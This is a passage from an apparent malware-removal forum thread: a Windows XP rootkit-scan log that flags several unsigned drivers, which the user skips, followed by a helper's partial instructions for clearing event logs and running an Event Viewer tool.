08:09:02.0437 2240 [ 325BB26842FC7CCC1FCCE2C457317F3E ] MSPCLOCK C:\WINDOWS\system32\drivers\MSPCLOCK.sys
08:09:02.0625 2240 MSPCLOCK - ok
08:09:02.0625 2240 [ BAD59648BA099DA4A17680B39730CB3D ] MSPQM C:\WINDOWS\system32\drivers\MSPQM.sys
08:09:02.0812 2240 MSPQM - ok
08:09:02.0828 2240 [ AF5F4F3F14A8EA2C26DE30F7A1E17136 ] mssmbios C:\WINDOWS\system32\DRIVERS\mssmbios.sys
08:09:02.0968 2240 mssmbios - ok
08:09:03.0015 2240 [ DE6A75F5C270E756C5508D94B6CF68F5 ] Mup C:\WINDOWS\system32\drivers\Mup.sys
08:09:03.0046 2240 Mup - ok
08:09:03.0093 2240 [ 0102140028FAD045756796E1C685D695 ] napagent C:\WINDOWS\System32\qagentrt.dll
08:09:03.0265 2240 napagent - ok
08:09:03.0312 2240 [ 1DF7F42665C94B825322FAE71721130D ] NDIS C:\WINDOWS\system32\drivers\NDIS.sys
08:09:03.0468 2240 NDIS - ok
08:09:03.0515 2240 [ 0109C4F3850DFBAB279542515386AE22 ] NdisTapi C:\WINDOWS\system32\DRIVERS\ndistapi.sys
08:09:03.0546 2240 NdisTapi - ok
08:09:03.0593 2240 [ F927A4434C5028758A842943EF1A3849 ] Ndisuio C:\WINDOWS\system32\DRIVERS\ndisuio.sys
08:09:03.0750 2240 Ndisuio - ok
08:09:03.0765 2240 [ EDC1531A49C80614B2CFDA43CA8659AB ] NdisWan C:\WINDOWS\system32\DRIVERS\ndiswan.sys
08:09:03.0921 2240 NdisWan - ok
08:09:03.0953 2240 [ 9282BD12DFB069D3889EB3FCC1000A9B ] NDProxy C:\WINDOWS\system32\drivers\NDProxy.sys
08:09:04.0031 2240 NDProxy - ok
08:09:04.0062 2240 [ 2969D26EEE289BE7422AA46FC55F4E38 ] Net Driver HPZ12 C:\WINDOWS\system32\HPZinw12.dll
08:09:04.0093 2240 Net Driver HPZ12 ( UnsignedFile.Multi.Generic ) - warning
08:09:04.0093 2240 Net Driver HPZ12 - detected UnsignedFile.Multi.Generic (1)
08:09:04.0125 2240 [ 5D81CF9A2F1A3A756B66CF684911CDF0 ] NetBIOS C:\WINDOWS\system32\DRIVERS\netbios.sys
08:09:04.0296 2240 NetBIOS - ok
08:09:04.0312 2240 [ 74B2B2F5BEA5E9A3DC021D685551BD3D ] NetBT C:\WINDOWS\system32\DRIVERS\netbt.sys
08:09:04.0468 2240 NetBT - ok
08:09:04.0500 2240 [ B857BA82860D7FF85AE29B095645563B ] NetDDE C:\WINDOWS\system32\netdde.exe
08:09:04.0687 2240 NetDDE - ok
08:09:04.0703 2240 [ B857BA82860D7FF85AE29B095645563B ] NetDDEdsdm C:\WINDOWS\system32\netdde.exe
08:09:04.0859 2240 NetDDEdsdm - ok
08:09:04.0906 2240 [ BF2466B3E18E970D8A976FB95FC1CA85 ] Netlogon C:\WINDOWS\system32\lsass.exe
08:09:05.0078 2240 Netlogon - ok
08:09:05.0109 2240 [ 13E67B55B3ABD7BF3FE7AAE5A0F9A9DE ] Netman C:\WINDOWS\System32\netman.dll
08:09:05.0281 2240 Netman - ok
08:09:05.0312 2240 [ D34612C5D02D026535B3095D620626AE ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
08:09:05.0343 2240 NetTcpPortSharing - ok
08:09:05.0359 2240 [ E9E47CFB2D461FA0FC75B7A74C6383EA ] NIC1394 C:\WINDOWS\system32\DRIVERS\nic1394.sys
08:09:05.0531 2240 NIC1394 - ok
08:09:05.0562 2240 [ 943337D786A56729263071623BBB9DE5 ] Nla C:\WINDOWS\System32\mswsock.dll
08:09:05.0609 2240 Nla - ok
08:09:05.0656 2240 [ 3182D64AE053D6FB034F44B6DEF8034A ] Npfs C:\WINDOWS\system32\drivers\Npfs.sys
08:09:05.0812 2240 Npfs - ok
08:09:05.0828 2240 [ 78A08DD6A8D65E697C18E1DB01C5CDCA ] Ntfs C:\WINDOWS\system32\drivers\Ntfs.sys
08:09:06.0000 2240 Ntfs - ok
08:09:06.0015 2240 [ BF2466B3E18E970D8A976FB95FC1CA85 ] NtLmSsp C:\WINDOWS\System32\lsass.exe
08:09:06.0171 2240 NtLmSsp - ok
08:09:06.0218 2240 [ 156F64A3345BD23C600655FB4D10BC08 ] NtmsSvc C:\WINDOWS\system32\ntmssvc.dll
08:09:06.0390 2240 NtmsSvc - ok
08:09:06.0437 2240 [ 73C1E1F395918BC2C6DD67AF7591A3AD ] Null C:\WINDOWS\system32\drivers\Null.sys
08:09:06.0593 2240 Null - ok
08:09:06.0640 2240 [ B305F3FAD35083837EF46A0BBCE2FC57 ] NwlnkFlt C:\WINDOWS\system32\DRIVERS\nwlnkflt.sys
08:09:06.0796 2240 NwlnkFlt - ok
08:09:06.0812 2240 [ C99B3415198D1AAB7227F2C88FD664B9 ] NwlnkFwd C:\WINDOWS\system32\DRIVERS\nwlnkfwd.sys
08:09:06.0984 2240 NwlnkFwd - ok
08:09:07.0031 2240 [ CA33832DF41AFB202EE7AEB05145922F ] ohci1394 C:\WINDOWS\system32\DRIVERS\ohci1394.sys
08:09:07.0187 2240 ohci1394 - ok
08:09:07.0281 2240 [ 7A56CF3E3F12E8AF599963B16F50FB6A ] ose C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
08:09:07.0296 2240 ose - ok
08:09:07.0328 2240 [ 5575FAF8F97CE5E713D108C2A58D7C7C ] Parport C:\WINDOWS\system32\DRIVERS\parport.sys
08:09:07.0484 2240 Parport - ok
08:09:07.0515 2240 [ BEB3BA25197665D82EC7065B724171C6 ] PartMgr C:\WINDOWS\system32\drivers\PartMgr.sys
08:09:07.0656 2240 PartMgr - ok
08:09:07.0703 2240 [ 70E98B3FD8E963A6A46A2E6247E0BEA1 ] ParVdm C:\WINDOWS\system32\drivers\ParVdm.sys
08:09:07.0875 2240 ParVdm - ok
08:09:07.0906 2240 [ A219903CCF74233761D92BEF471A07B1 ] PCI C:\WINDOWS\system32\DRIVERS\pci.sys
08:09:08.0062 2240 PCI - ok
08:09:08.0078 2240 PCIDump - ok
08:09:08.0093 2240 [ CCF5F451BB1A5A2A522A76E670000FF0 ] PCIIde C:\WINDOWS\system32\DRIVERS\pciide.sys
08:09:08.0250 2240 PCIIde - ok
08:09:08.0265 2240 [ 9E89EF60E9EE05E3F2EEF2DA7397F1C1 ] Pcmcia C:\WINDOWS\system32\drivers\Pcmcia.sys
08:09:08.0437 2240 Pcmcia - ok
08:09:08.0453 2240 PDCOMP - ok
08:09:08.0453 2240 PDFRAME - ok
08:09:08.0468 2240 PDRELI - ok
08:09:08.0484 2240 PDRFRAME - ok
08:09:08.0484 2240 perc2 - ok
08:09:08.0500 2240 perc2hib - ok
08:09:08.0546 2240 [ 444F122E68DB44C0589227781F3C8B3F ] Pfc C:\WINDOWS\system32\drivers\pfc.sys
08:09:08.0546 2240 Pfc ( UnsignedFile.Multi.Generic ) - warning
08:09:08.0546 2240 Pfc - detected UnsignedFile.Multi.Generic (1)
08:09:08.0578 2240 [ 65DF52F5B8B6E9BBD183505225C37315 ] PlugPlay C:\WINDOWS\system32\services.exe
08:09:08.0609 2240 PlugPlay - ok
08:09:08.0625 2240 [ BAFC9706BDF425A02B66468AB2605C59 ] Pml Driver HPZ12 C:\WINDOWS\system32\HPZipm12.dll
08:09:08.0656 2240 Pml Driver HPZ12 ( UnsignedFile.Multi.Generic ) - warning
08:09:08.0656 2240 Pml Driver HPZ12 - detected UnsignedFile.Multi.Generic (1)
08:09:08.0656 2240 [ BF2466B3E18E970D8A976FB95FC1CA85 ] PolicyAgent C:\WINDOWS\system32\lsass.exe
08:09:08.0812 2240 PolicyAgent - ok
08:09:08.0859 2240 [ EFEEC01B1D3CF84F16DDD24D9D9D8F99 ] PptpMiniport C:\WINDOWS\system32\DRIVERS\raspptp.sys
08:09:09.0015 2240 PptpMiniport - ok
08:09:09.0062 2240 [ A32BEBAF723557681BFC6BD93E98BD26 ] Processor C:\WINDOWS\system32\DRIVERS\processr.sys
08:09:09.0234 2240 Processor - ok
08:09:09.0250 2240 [ BF2466B3E18E970D8A976FB95FC1CA85 ] ProtectedStorage C:\WINDOWS\system32\lsass.exe
08:09:09.0390 2240 ProtectedStorage - ok
08:09:09.0421 2240 [ 390C204CED3785609AB24E9C52054A84 ] Ps2 C:\WINDOWS\system32\DRIVERS\PS2.sys
08:09:09.0484 2240 Ps2 - ok
08:09:09.0515 2240 [ 09298EC810B07E5D582CB3A3F9255424 ] PSched C:\WINDOWS\system32\DRIVERS\psched.sys
08:09:09.0687 2240 PSched - ok
08:09:09.0718 2240 [ 80D317BD1C3DBC5D4FE7B1678C60CADD ] Ptilink C:\WINDOWS\system32\DRIVERS\ptilink.sys
08:09:09.0859 2240 Ptilink - ok
08:09:09.0906 2240 [ E42E3433DBB4CFFE8FDD91EAB29AEA8E ] PxHelp20 C:\WINDOWS\system32\DRIVERS\PxHelp20.sys
08:09:09.0921 2240 PxHelp20 - ok
08:09:09.0937 2240 ql1080 - ok
08:09:09.0953 2240 Ql10wnt - ok
08:09:09.0953 2240 ql12160 - ok
08:09:09.0968 2240 ql1240 - ok
08:09:09.0984 2240 ql1280 - ok
08:09:10.0015 2240 [ FE0D99D6F31E4FAD8159F690D68DED9C ] RasAcd C:\WINDOWS\system32\DRIVERS\rasacd.sys
08:09:10.0171 2240 RasAcd - ok
08:09:10.0203 2240 [ AD188BE7BDF94E8DF4CA0A55C00A5073 ] RasAuto C:\WINDOWS\System32\rasauto.dll
08:09:10.0375 2240 RasAuto - ok
08:09:10.0406 2240 [ 11B4A627BC9614B885C4969BFA5FF8A6 ] Rasl2tp C:\WINDOWS\system32\DRIVERS\rasl2tp.sys
08:09:10.0546 2240 Rasl2tp - ok
08:09:10.0578 2240 [ 76A9A3CBEADD68CC57CDA5E1D7448235 ] RasMan C:\WINDOWS\System32\rasmans.dll
08:09:10.0750 2240 RasMan - ok
08:09:10.0765 2240 [ 5BC962F2654137C9909C3D4603587DEE ] RasPppoe C:\WINDOWS\system32\DRIVERS\raspppoe.sys
08:09:10.0921 2240 RasPppoe - ok
08:09:10.0953 2240 [ FDBB1D60066FCFBB7452FD8F9829B242 ] Raspti C:\WINDOWS\system32\DRIVERS\raspti.sys
08:09:11.0109 2240 Raspti - ok
08:09:11.0125 2240 [ 7AD224AD1A1437FE28D89CF22B17780A ] Rdbss C:\WINDOWS\system32\DRIVERS\rdbss.sys
08:09:11.0281 2240 Rdbss - ok
08:09:11.0328 2240 [ 4912D5B403614CE99C28420F75353332 ] RDPCDD C:\WINDOWS\system32\DRIVERS\RDPCDD.sys
08:09:11.0484 2240 RDPCDD - ok
08:09:11.0531 2240 [ 43AF5212BD8FB5BA6EED9754358BD8F7 ] RDPWD C:\WINDOWS\system32\drivers\RDPWD.sys
08:09:11.0593 2240 RDPWD - ok
08:09:11.0625 2240 [ 3C37BF86641BDA977C3BF8A840F3B7FA ] RDSessMgr C:\WINDOWS\system32\sessmgr.exe
08:09:11.0781 2240 RDSessMgr - ok
08:09:11.0828 2240 [ F828DD7E1419B6653894A8F97A0094C5 ] redbook C:\WINDOWS\system32\DRIVERS\redbook.sys
08:09:11.0984 2240 redbook - ok
08:09:12.0015 2240 [ 7E699FF5F59B5D9DE5390E3C34C67CF5 ] RemoteAccess C:\WINDOWS\System32\mprdim.dll
08:09:12.0203 2240 RemoteAccess - ok
08:09:12.0234 2240 [ AAED593F84AFA419BBAE8572AF87CF6A ] RpcLocator C:\WINDOWS\System32\locator.exe
08:09:12.0390 2240 RpcLocator - ok
08:09:12.0406 2240 [ 6B27A5C03DFB94B4245739065431322C ] RpcSs C:\WINDOWS\System32\rpcss.dll
08:09:12.0468 2240 RpcSs - ok
08:09:12.0484 2240 [ 471B3F9741D762ABE75E9DEEA4787E47 ] RSVP C:\WINDOWS\System32\rsvp.exe
08:09:12.0671 2240 RSVP - ok
08:09:12.0718 2240 [ 2EF9C0DC26B30B2318B1FC3FAA1F0AE7 ] rtl8139 C:\WINDOWS\system32\DRIVERS\R8139n51.SYS
08:09:12.0796 2240 rtl8139 - ok
08:09:12.0812 2240 [ BF2466B3E18E970D8A976FB95FC1CA85 ] SamSs C:\WINDOWS\system32\lsass.exe
08:09:12.0953 2240 SamSs - ok
08:09:13.0031 2240 [ 39763504067962108505BFF25F024345 ] SASDIFSV C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS
08:09:13.0062 2240 SASDIFSV - ok
08:09:13.0093 2240 [ 77B9FC20084B48408AD3E87570EB4A85 ] SASKUTIL C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS
08:09:13.0109 2240 SASKUTIL - ok
08:09:13.0156 2240 [ 86D007E7A654B9A71D1D7D856B104353 ] SCardSvr C:\WINDOWS\System32\SCardSvr.exe
08:09:13.0328 2240 SCardSvr - ok
08:09:13.0375 2240 [ 0A9A7365A1CA4319AA7C1D6CD8E4EAFA ] Schedule C:\WINDOWS\system32\schedsvc.dll
08:09:13.0531 2240 Schedule - ok
08:09:13.0562 2240 [ 90A3935D05B494A5A39D37E71F09A677 ] Secdrv C:\WINDOWS\system32\DRIVERS\secdrv.sys
08:09:13.0640 2240 Secdrv - ok
08:09:13.0687 2240 [ CBE612E2BB6A10E3563336191EDA1250 ] seclogon C:\WINDOWS\System32\seclogon.dll
08:09:13.0843 2240 seclogon - ok
08:09:13.0843 2240 [ 7FDD5D0684ECA8C1F68B4D99D124DCD0 ] SENS C:\WINDOWS\system32\sens.dll
08:09:14.0031 2240 SENS - ok
08:09:14.0093 2240 [ CCA207A8896D4C6A0C9CE29A4AE411A7 ] Serial C:\WINDOWS\system32\drivers\Serial.sys
08:09:14.0234 2240 Serial - ok
08:09:14.0265 2240 [ 8E6B8C671615D126FDC553D1E2DE5562 ] Sfloppy C:\WINDOWS\system32\drivers\Sfloppy.sys
08:09:14.0421 2240 Sfloppy - ok
08:09:14.0468 2240 [ 83F41D0D89645D7235C051AB1D9523AC ] SharedAccess C:\WINDOWS\System32\ipnathlp.dll
08:09:14.0625 2240 SharedAccess - ok
08:09:14.0656 2240 [ 99BC0B50F511924348BE19C7C7313BBF ] ShellHWDetection C:\WINDOWS\System32\shsvcs.dll
08:09:14.0703 2240 ShellHWDetection - ok
08:09:14.0703 2240 Simbad - ok
08:09:14.0750 2240 [ 94F6EEA8A688A37F71BF9C9AEAA42666 ] SiS315 C:\WINDOWS\system32\DRIVERS\sisgrp.sys
08:09:14.0859 2240 SiS315 - ok
08:09:14.0875 2240 [ 61CA562DEF09A782D26B3E7EDEC5369A ] SISAGP C:\WINDOWS\system32\DRIVERS\SISAGPX.sys
08:09:14.0921 2240 SISAGP - ok
08:09:14.0968 2240 [ 837D26F79A1647066D75C5C811887475 ] SiSkp C:\WINDOWS\system32\DRIVERS\srvkp.sys
08:09:15.0000 2240 SiSkp - ok
08:09:15.0000 2240 Sparrow - ok
08:09:15.0046 2240 [ AB8B92451ECB048A4D1DE7C3FFCB4A9F ] splitter C:\WINDOWS\system32\drivers\splitter.sys
08:09:15.0203 2240 splitter - ok
08:09:15.0265 2240 [ 60784F891563FB1B767F70117FC2428F ] Spooler C:\WINDOWS\system32\spoolsv.exe
08:09:15.0312 2240 Spooler - ok
08:09:15.0328 2240 [ 76BB022C2FB6902FD5BDD4F78FC13A5D ] sr C:\WINDOWS\system32\DRIVERS\sr.sys
08:09:15.0406 2240 sr - ok
08:09:15.0453 2240 [ 3805DF0AC4296A34BA4BF93B346CC378 ] srservice C:\WINDOWS\system32\srsvc.dll
08:09:15.0546 2240 srservice - ok
08:09:15.0578 2240 [ 47DDFC2F003F7F9F0592C6874962A2E7 ] Srv C:\WINDOWS\system32\DRIVERS\srv.sys
08:09:15.0625 2240 Srv - ok
08:09:15.0671 2240 [ 0A5679B3714EDAB99E357057EE88FCA6 ] SSDPSRV C:\WINDOWS\System32\ssdpsrv.dll
08:09:15.0750 2240 SSDPSRV - ok
08:09:15.0781 2240 [ A9573045BAA16EAB9B1085205B82F1ED ] StillCam C:\WINDOWS\system32\DRIVERS\serscan.sys
08:09:15.0953 2240 StillCam - ok
08:09:16.0000 2240 [ 8BAD69CBAC032D4BBACFCE0306174C30 ] stisvc C:\WINDOWS\system32\wiaservc.dll
08:09:16.0187 2240 stisvc - ok
08:09:16.0218 2240 [ 3941D127AEF12E93ADDF6FE6EE027E0F ] swenum C:\WINDOWS\system32\DRIVERS\swenum.sys
08:09:16.0375 2240 swenum - ok
08:09:16.0390 2240 [ 8CE882BCC6CF8A62F2B2323D95CB3D01 ] swmidi C:\WINDOWS\system32\drivers\swmidi.sys
08:09:16.0531 2240 swmidi - ok
08:09:16.0546 2240 SwPrv - ok
08:09:16.0562 2240 symc810 - ok
08:09:16.0578 2240 symc8xx - ok
08:09:16.0593 2240 sym_hi - ok
08:09:16.0593 2240 sym_u3 - ok
08:09:16.0625 2240 [ 8B83F3ED0F1688B4958F77CD6D2BF290 ] sysaudio C:\WINDOWS\system32\drivers\sysaudio.sys
08:09:16.0781 2240 sysaudio - ok
08:09:16.0812 2240 [ C7ABBC59B43274B1109DF6B24D617051 ] SysmonLog C:\WINDOWS\system32\smlogsvc.exe
08:09:16.0984 2240 SysmonLog - ok
08:09:17.0031 2240 [ 3CB78C17BB664637787C9A1C98F79C38 ] TapiSrv C:\WINDOWS\System32\tapisrv.dll
08:09:17.0203 2240 TapiSrv - ok
08:09:17.0250 2240 [ 9AEFA14BD6B182D61E3119FA5F436D3D ] Tcpip C:\WINDOWS\system32\DRIVERS\tcpip.sys
08:09:17.0281 2240 Tcpip - ok
08:09:17.0312 2240 [ 6471A66807F5E104E4885F5B67349397 ] TDPIPE C:\WINDOWS\system32\drivers\TDPIPE.sys
08:09:17.0484 2240 TDPIPE - ok
08:09:17.0500 2240 [ C56B6D0402371CF3700EB322EF3AAF61 ] TDTCP C:\WINDOWS\system32\drivers\TDTCP.sys
08:09:17.0656 2240 TDTCP - ok
08:09:17.0656 2240 [ 88155247177638048422893737429D9E ] TermDD C:\WINDOWS\system32\DRIVERS\termdd.sys
08:09:17.0828 2240 TermDD - ok
08:09:17.0875 2240 [ FF3477C03BE7201C294C35F684B3479F ] TermService C:\WINDOWS\System32\termsrv.dll
08:09:18.0062 2240 TermService - ok
08:09:18.0078 2240 [ 99BC0B50F511924348BE19C7C7313BBF ] Themes C:\WINDOWS\System32\shsvcs.dll
08:09:18.0109 2240 Themes - ok
08:09:18.0125 2240 TosIde - ok
08:09:18.0171 2240 [ 55BCA12F7F523D35CA3CB833C725F54E ] TrkWks C:\WINDOWS\system32\trkwks.dll
08:09:18.0343 2240 TrkWks - ok
08:09:18.0375 2240 [ 5787B80C2E3C5E2F56C2A233D91FA2C9 ] Udfs C:\WINDOWS\system32\drivers\Udfs.sys
08:09:18.0531 2240 Udfs - ok
08:09:18.0546 2240 ultra - ok
08:09:18.0593 2240 [ 402DDC88356B1BAC0EE3DD1580C76A31 ] Update C:\WINDOWS\system32\DRIVERS\update.sys
08:09:18.0765 2240 Update - ok
08:09:18.0812 2240 [ 1EBAFEB9A3FBDC41B8D9C7F0F687AD91 ] upnphost C:\WINDOWS\System32\upnphost.dll
08:09:18.0906 2240 upnphost - ok
08:09:18.0937 2240 [ 05365FB38FCA1E98F7A566AAAF5D1815 ] UPS C:\WINDOWS\System32\ups.exe
08:09:19.0093 2240 UPS - ok
08:09:19.0140 2240 [ E919708DB44ED8543A7C017953148330 ] usbaudio C:\WINDOWS\system32\drivers\usbaudio.sys
08:09:19.0328 2240 usbaudio - ok
08:09:19.0375 2240 [ 173F317CE0DB8E21322E71B7E60A27E8 ] usbccgp C:\WINDOWS\system32\DRIVERS\usbccgp.sys
08:09:19.0515 2240 usbccgp - ok
08:09:19.0546 2240 [ 65DCF09D0E37D4C6B11B5B0B76D470A7 ] usbehci C:\WINDOWS\system32\DRIVERS\usbehci.sys
08:09:19.0703 2240 usbehci - ok
08:09:19.0718 2240 [ 1AB3CDDE553B6E064D2E754EFE20285C ] usbhub C:\WINDOWS\system32\DRIVERS\usbhub.sys
08:09:19.0875 2240 usbhub - ok
08:09:19.0906 2240 [ 0DAECCE65366EA32B162F85F07C6753B ] usbohci C:\WINDOWS\system32\DRIVERS\usbohci.sys
08:09:20.0062 2240 usbohci - ok
08:09:20.0093 2240 [ A717C8721046828520C9EDF31288FC00 ] usbprint C:\WINDOWS\system32\DRIVERS\usbprint.sys
08:09:20.0250 2240 usbprint - ok
08:09:20.0281 2240 [ A0B8CF9DEB1184FBDD20784A58FA75D4 ] usbscan C:\WINDOWS\system32\DRIVERS\usbscan.sys
08:09:20.0453 2240 usbscan - ok
08:09:20.0500 2240 [ A32426D9B14A089EAA1D922E0C5801A9 ] USBSTOR C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS
08:09:20.0656 2240 USBSTOR - ok
08:09:20.0671 2240 [ 26496F9DEE2D787FC3E61AD54821FFE6 ] usbuhci C:\WINDOWS\system32\DRIVERS\usbuhci.sys
08:09:20.0812 2240 usbuhci - ok
08:09:20.0859 2240 [ 0D3A8FAFCEACD8B7625CD549757A7DF1 ] VgaSave C:\WINDOWS\System32\drivers\vga.sys
08:09:21.0015 2240 VgaSave - ok
08:09:21.0062 2240 [ 4B039BBD037B01F5DB5A144C837F283A ] viaagp1 C:\WINDOWS\system32\DRIVERS\viaagp1.sys
08:09:21.0125 2240 viaagp1 - ok
08:09:21.0156 2240 [ 0CC705DB634A3BC355887E3D478DD386 ] viagfx C:\WINDOWS\system32\DRIVERS\vtmini.sys
08:09:21.0187 2240 viagfx - ok
08:09:21.0218 2240 [ 3B3EFCDA263B8AC14FDF9CBDD0791B2E ] ViaIde C:\WINDOWS\system32\DRIVERS\viaide.sys
08:09:21.0343 2240 ViaIde - ok
08:09:21.0375 2240 [ 4C8FCB5CC53AAB716D810740FE59D025 ] VolSnap C:\WINDOWS\system32\drivers\VolSnap.sys
08:09:21.0531 2240 VolSnap - ok
08:09:21.0562 2240 [ 7A9DB3A67C333BF0BD42E42B8596854B ] VSS C:\WINDOWS\System32\vssvc.exe
08:09:21.0671 2240 VSS - ok
08:09:21.0718 2240 [ 54AF4B1D5459500EF0937F6D33B1914F ] W32Time C:\WINDOWS\system32\w32time.dll
08:09:21.0875 2240 W32Time - ok
08:09:21.0906 2240 [ E20B95BAEDB550F32DD489265C1DA1F6 ] Wanarp C:\WINDOWS\system32\DRIVERS\wanarp.sys
08:09:22.0062 2240 Wanarp - ok
08:09:22.0062 2240 WDICA - ok
08:09:22.0093 2240 [ 6768ACF64B18196494413695F0C3A00F ] wdmaud C:\WINDOWS\system32\drivers\wdmaud.sys
08:09:22.0234 2240 wdmaud - ok
08:09:22.0296 2240 [ 77A354E28153AD2D5E120A5A8687BC06 ] WebClient C:\WINDOWS\System32\webclnt.dll
08:09:22.0453 2240 WebClient - ok
08:09:22.0546 2240 [ F45DD1E1365D857DD08BC23563370D0E ] WinDefend C:\Program Files\Windows Defender\MsMpEng.exe
08:09:22.0562 2240 WinDefend - ok
08:09:22.0640 2240 [ 2D0E4ED081963804CCC196A0929275B5 ] winmgmt C:\WINDOWS\system32\wbem\WMIsvc.dll
08:09:22.0781 2240 winmgmt - ok
08:09:22.0843 2240 [ C51B4A5C05A5475708E3C81C7765B71D ] WmdmPmSN C:\WINDOWS\system32\MsPMSNSv.dll
08:09:22.0890 2240 WmdmPmSN - ok
08:09:22.0937 2240 [ E0673F1106E62A68D2257E376079F821 ] WmiApSrv C:\WINDOWS\System32\wbem\wmiapsrv.exe
08:09:23.0093 2240 WmiApSrv - ok
08:09:23.0187 2240 [ F74E3D9A7FA9556C3BBB14D4E5E63D3B ] WMPNetworkSvc C:\Program Files\Windows Media Player\WMPNetwk.exe
08:09:23.0234 2240 WMPNetworkSvc - ok
08:09:23.0281 2240 [ CF4DEF1BF66F06964DC0D91844239104 ] WpdUsb C:\WINDOWS\system32\DRIVERS\wpdusb.sys
08:09:23.0312 2240 WpdUsb - ok
08:09:23.0359 2240 [ 6ABE6E225ADB5A751622A9CC3BC19CE8 ] WS2IFSL C:\WINDOWS\System32\drivers\ws2ifsl.sys
08:09:23.0500 2240 WS2IFSL - ok
08:09:23.0546 2240 [ 7C278E6408D1DCE642230C0585A854D5 ] wscsvc C:\WINDOWS\system32\wscsvc.dll
08:09:23.0734 2240 wscsvc - ok
08:09:23.0781 2240 [ 35321FB577CDC98CE3EB3A3EB9E4610A ] wuauserv C:\WINDOWS\system32\wuauserv.dll
08:09:23.0937 2240 wuauserv - ok
08:09:23.0984 2240 [ F15FEAFFFBB3644CCC80C5DA584E6311 ] WudfPf C:\WINDOWS\system32\DRIVERS\WudfPf.sys
08:09:24.0031 2240 WudfPf - ok
08:09:24.0062 2240 [ 28B524262BCE6DE1F7EF9F510BA3985B ] WudfRd C:\WINDOWS\system32\DRIVERS\wudfrd.sys
08:09:24.0093 2240 WudfRd - ok
08:09:24.0125 2240 [ 05231C04253C5BC30B26CBAAE680ED89 ] WudfSvc C:\WINDOWS\System32\WUDFSvc.dll
08:09:24.0187 2240 WudfSvc - ok
08:09:24.0250 2240 [ 81DC3F549F44B1C1FFF022DEC9ECF30B ] WZCSVC C:\WINDOWS\System32\wzcsvc.dll
08:09:24.0468 2240 WZCSVC - ok
08:09:24.0500 2240 [ 295D21F14C335B53CB8154E5B1F892B9 ] xmlprov C:\WINDOWS\System32\xmlprov.dll
08:09:24.0703 2240 xmlprov - ok
08:09:24.0718 2240 ================ Scan global ===============================
08:09:24.0750 2240 [ 42F1F4C0AFB08410E5F02D4B13EBB623 ] C:\WINDOWS\system32\basesrv.dll
08:09:24.0796 2240 [ 8C7DCA4B158BF16894120786A7A5F366 ] C:\WINDOWS\system32\winsrv.dll
08:09:24.0828 2240 [ 8C7DCA4B158BF16894120786A7A5F366 ] C:\WINDOWS\system32\winsrv.dll
08:09:24.0859 2240 [ 65DF52F5B8B6E9BBD183505225C37315 ] C:\WINDOWS\system32\services.exe
08:09:24.0875 2240 [Global] - ok
08:09:24.0875 2240 ================ Scan MBR ==================================
08:09:24.0890 2240 [ BAD0263FBE81B49F5F07B32DC9D198B3 ] \Device\Harddisk0\DR0
08:09:25.0125 2240 \Device\Harddisk0\DR0 - ok
08:09:25.0125 2240 ================ Scan VBR ==================================
08:09:25.0125 2240 [ 29EED5D12AE78A897E7DAAD5F2670E2C ] \Device\Harddisk0\DR0\Partition1
08:09:25.0140 2240 \Device\Harddisk0\DR0\Partition1 - ok
08:09:25.0140 2240 [ 98DE57513725D00BD7B7284BCAEF83E8 ] \Device\Harddisk0\DR0\Partition2
08:09:25.0140 2240 \Device\Harddisk0\DR0\Partition2 - ok
08:09:25.0140 2240 ============================================================
08:09:25.0140 2240 Scan finished
08:09:25.0140 2240 ============================================================
08:09:25.0250 2372 Detected object count: 12
08:09:25.0250 2372 Actual detected object count: 12
08:09:48.0093 2372 BVRPMPR5 ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0093 2372 BVRPMPR5 ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0093 2372 hpqcxs08 ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0093 2372 hpqcxs08 ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0093 2372 hpqddsvc ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0093 2372 hpqddsvc ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0093 2372 Iviaspi ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0093 2372 Iviaspi ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0093 2372 McciCMService ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0093 2372 McciCMService ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0109 2372 MREMP50 ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0109 2372 MREMP50 ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0109 2372 MREMPR5 ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0109 2372 MREMPR5 ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0109 2372 MRENDIS5 ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0109 2372 MRENDIS5 ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0109 2372 MRESP50 ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0109 2372 MRESP50 ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0109 2372 Net Driver HPZ12 ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0109 2372 Net Driver HPZ12 ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0109 2372 Pfc ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0109 2372 Pfc ( UnsignedFile.Multi.Generic ) - User select action: Skip
08:09:48.0125 2372 Pml Driver HPZ12 ( UnsignedFile.Multi.Generic ) - skipped by user
08:09:48.0125 2372 Pml Driver HPZ12 ( UnsignedFile.Multi.Generic ) - User select action: Skip

#14
RKinner

    Malware Expert

  • Expert
  • 24,624 posts
  • MVP
After you do the stuff in my last post, let's check if it worked:

Right-click on (My) Computer and select Manage (Continue), then the Event Viewer. Next select Windows Logs. Right-click on System and Clear Log, Clear. Repeat for Application.

Reboot.

1. Please download the Event Viewer Tool by Vino Rosso
http://images.malwar...om/vino/VEW.exe
and save it to your Desktop.
2. Right-click VEW.exe and Run As Administrator
3. Under 'Select log to query', select:
* System
4. Under 'Select type to list', select:
* Error
* Warning

Then use the 'Number of events' as follows:

1. Click the radio button for 'Number of events'
